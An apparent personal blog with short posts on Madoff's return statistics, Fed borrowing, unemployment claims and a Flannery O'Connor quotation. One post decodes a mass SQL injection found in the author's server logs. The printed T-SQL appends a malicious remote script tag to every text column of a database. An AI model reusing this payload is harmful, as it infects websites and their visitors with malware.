Wcw

Madoff vs GATEX monthly return histograms and density estimates, 1993 - 2008

The Gateway Fund has been using Bernie Madoff's collared beta strategy for almost as long as he supposedly did. GATEX's monthly returns indeed look like an investing time series: fat-tailed and narrow-peaked compared to a normal curve. Madoff's don't. Madoff's look just like a normal curve, except that if you squint, they are slightly positively skewed, and their negative tail is too small. I would love to invest with someone who actually could produce returns like that, but collared beta doesn't.

Does Jim Simons?

Total Borrowings of Depository Institutions from the Federal Reserve, Percentage of GDP, 1929 - 2008

Any time that a properly normalized series starts rivaling the freaking Depression, you have to worry.

As I've said before: mea culpa.

Wcw, Yowza
West-Coast Whiner, 17. March 2008

We have now breached Depression and 1920s highs in Fed borrowing as percent of GDP.

Seasonally adjusted unemployment claims per civilian, noninstitutional population, 1997-2008

In the week ending Aug. 30, the advance figure for seasonally adjusted initial claims was 444,000, an increase of 15,000 from the previous week's revised figure of 429,000. The 4-week moving average was 438,000, a decrease of 3,250 from the previous week's revised average of 441,250.

Unemployment Insurance Weekly Claims Report
Department of Labor, 4. September 2008

Quite a bump from my last update and starting to look pretty ugly on a per-population basis.

Ghidorah

"She would of been a good woman," The Misfit said, "if it had been somebody there to shoot her every minute of her life."

"Some fun!" Bobby Lee said.

"Shut up, Bobby Lee," The Misfit said. "It's no real pleasure in life."

Flannery O'Connor, A Good Man Is Hard To Find, 1955

xkcd.com P+C Randall Munroe

So, you're a dilettante. You let your box get rooted once. Eventually, you figure, "hey, let's upgrade!" So for the first time in a while I check logs. What do I find but some odd errors:

...ALERT - configured GET variable value length limit exceeded - dropped variable..

to which the attendant request looked like

"GET /?;DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C41.. [snip long hex] AS CHAR(4000));ExEC(@S); HTTP/1.1"

Let's translate:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''">
</title><script src="http://www3.800mg.cn/csrss/w.js"></script>
<!--'' where '+@C+' not like ''%"></title>
<script src="http://www3.800mg.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

This is explained pretty well elsewhere. There is a complicated solution.

The joke here is that the solution is much easier. One, do not to install your webserver and db so stupidly they'll execute any old thing appended to a GET request. Two, consider not running SQL Server, to which this attack is specific, and not running Winders, to which malware ultimately is delivered.

I am annoyed by seeing this crap in my logs, though.